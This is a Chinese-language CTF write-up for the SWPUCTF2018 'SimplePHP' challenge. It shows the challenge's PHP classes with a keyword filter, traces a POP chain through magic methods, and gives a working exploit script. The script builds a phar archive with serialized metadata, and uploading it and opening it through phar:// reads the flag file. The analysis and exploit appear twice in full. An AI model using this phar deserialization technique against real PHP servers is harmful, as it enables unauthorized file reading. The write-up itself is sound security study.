SWPUCTF2018 SimplePHP

发布于 2021-08-06  72 次阅读


考点

无 unserialize的phar反序列化

解题

进入题目,访问首页的前端备注里面发现,给出了FLAG所在的位置,尝试访问,空白页面(我就说不能这么简单)。

image-20210803145535883

在文件上传页面测试了很久,发现过滤的非常严格,怎么都绕不过去。

终于在查看文件处,通过拼接文件名,可以查看源代码,因此根据文件包含的关系,得到后端代码

image-20210803150126657
image-20210803150320457

核心功能是class.php中定义好的类,根据该页面的提示,能够找到解题思路,phar的反序列化,接下来通过class.php分析POP链:

<?php
class C1e4r
{
public $test;
public $str;
public function __construct($name)
{
$this->str = $name;
}
public function __destruct()
{
$this->test = $this->str;
echo $this->test;
}
}

class Show
{
public $source;
public $str;
public function __construct($file)
{
$this->source = $file; //$this->source = phar://phar.jpg
echo $this->source;
}
public function __toString() //在直接输出对象引用时自动调用的 比如使用 echo、print_r
{
$content = $this->str['str']->source;
return $content;
}
public function __set($key,$value) //给一个未定义的属性赋值时,此方法会被触发
{
$this->$key = $value;
}
public function _show()
{
if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
die('hacker!');
} else {
highlight_file($this->source);
}

}
public function __wakeup() //反序列化的时候自动调用
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}
class Test
{
public $file;
public $params;
public function __construct()
{
$this->params = array();
}
public function __get($key) //当未定义的属性或没有权限访问的属性被访问时该方法会被调用
{
return $this->get($key);
}
public function get($key)
{
if(isset($this->params[$key])) {
$value = $this->params[$key];
} else {
$value = "index.php";
}
return $this->file_get($value);
}
public function file_get($value)
{
$text = base64_encode(file_get_contents($value));
return $text;
}
}
?>

我分析的思路是从可用的功能开始分析:

  • 很明显在class Test中,file_get方法能够读取文件,并进行base64加密,这就是我们要调用的核心功能
  • 因为file_get方法不是魔术方法,我们没有办法触发只能去找调用它的方法,找到get方法调用了file_get方法,而且这里也通过变量$params使得变量$value变成了我们的可控变量
  • 接着寻找调用get方法的方法,终于找到了魔术方法,__get调用了函数,__get的触发方式当我们试图获取一个不可达属性时(比如private),类会自动调用
  • 因此,想要触发__get就要需要class show里面的__toString,$this->str['str']->source 访问了自己的 source 变量,这个变量 Test 类可没有,所以这就是让 $this->str['str'] 为 Test 类的实例化对象。__toString触发方式在直接输出对象引用时自动调用的 比如使用 echo、print_r
  • 因此,可以使用class C1e4r的析构函数中的echo $this->test;去触发__toString
  • 总结POP链为:class C1e4r:__destruct -> class show:__tostring -> class Test:__get

由此构造可用EXP:

<?php
class C1e4r
{
public $test;
public $str;
}

class Show
{
public $source;
public $str;
}
class Test
{
public $file;
public $params;

}

$c1e4r = new C1e4r();
$show = new Show();
$test = new Test();
$test->params['source'] = "/var/www/html/f1ag.php";
$c1e4r->str = $show; //利用 $this->test = $this->str; echo $this->test;
$show->str['str'] = $test; //利用 $this->str['str']->source;


$phar = new Phar("exp.phar"); //.phar文件
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >'); //固定的
$phar->setMetadata($c1e4r); //触发的头是C1e4r类,所以传入C1e4r对象
$phar->addFromString("exp.txt", "test"); //随便写点什么生成个签名
$phar->stopBuffering();

?>

本地运行EXP生成exp.phar文件,将后缀名修改为.gif上传到服务器

由于这里Upload能直接查看文件名,因此不需要我们计算文件名,要是不能直接查看,根据funcation.php计算方式进行计算即可

最终使用phar伪协议即可读取到flag

image-20210803160559057
image-20210803160517985

反思

1.对phar反序列不熟悉,不知道如何构建EXP

2.分析到使用__toString去触发__get,分析不明白,代码审计能力不够强

3.如果在生成.phar文件时,pharonly出现报错,可以在php.ini中修改如下

[Phar]
; http://php.net/phar.readonly
phar.readonly = Off

参考

https://www.icode9.com/content-1-691670.html

https://www.cnblogs.com/h3zh1/p/12712426.html

我分析的思路是从可用的功能开始分析:

  • 很明显在class Test中,file_get方法能够读取文件,并进行base64加密,这就是我们要调用的核心功能
  • 因为file_get方法不是魔术方法,我们没有办法触发只能去找调用它的方法,找到get方法调用了file_get方法,而且这里也通过变量$params使得变量$value变成了我们的可控变量
  • 接着寻找调用get方法的方法,终于找到了魔术方法,__get调用了函数,__get的触发方式当我们试图获取一个不可达属性时(比如private),类会自动调用
  • 因此,想要触发__get就要需要class show里面的__toString,$this->str['str']->source 访问了自己的 source 变量,这个变量 Test 类可没有,所以这就是让 $this->str['str'] 为 Test 类的实例化对象。__toString触发方式在直接输出对象引用时自动调用的 比如使用 echo、print_r
  • 因此,可以使用class C1e4r的析构函数中的echo $this->test;去触发__toString
  • 总结POP链为:class C1e4r:__destruct -> class show:__tostring -> class Test:__get

由此构造可用EXP:

<?php
class C1e4r
{
public $test;
public $str;
}

class Show
{
public $source;
public $str;
}
class Test
{
public $file;
public $params;

}

$c1e4r = new C1e4r();
$show = new Show();
$test = new Test();
$test->params['source'] = "/var/www/html/f1ag.php";
$c1e4r->str = $show; //利用 $this->test = $this->str; echo $this->test;
$show->str['str'] = $test; //利用 $this->str['str']->source;


$phar = new Phar("exp.phar"); //.phar文件
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >'); //固定的
$phar->setMetadata($c1e4r); //触发的头是C1e4r类,所以传入C1e4r对象
$phar->addFromString("exp.txt", "test"); //随便写点什么生成个签名
$phar->stopBuffering();

?>

本地运行EXP生成exp.phar文件,将后缀名修改为.gif上传到服务器

由于这里Upload能直接查看文件名,因此不需要我们计算文件名,要是不能直接查看,根据funcation.php计算方式进行计算即可

最终使用phar伪协议即可读取到flag

image-20210803160559057
image-20210803160517985

反思

1.对phar反序列不熟悉,不知道如何构建EXP

2.分析到使用__toString去触发__get,分析不明白,代码审计能力不够强

3.如果在生成.phar文件时,pharonly出现报错,可以在php.ini中修改如下

[Phar]
; http://php.net/phar.readonly
phar.readonly = Off

参考

https://www.icode9.com/content-1-691670.html

https://www.cnblogs.com/h3zh1/p/12712426.html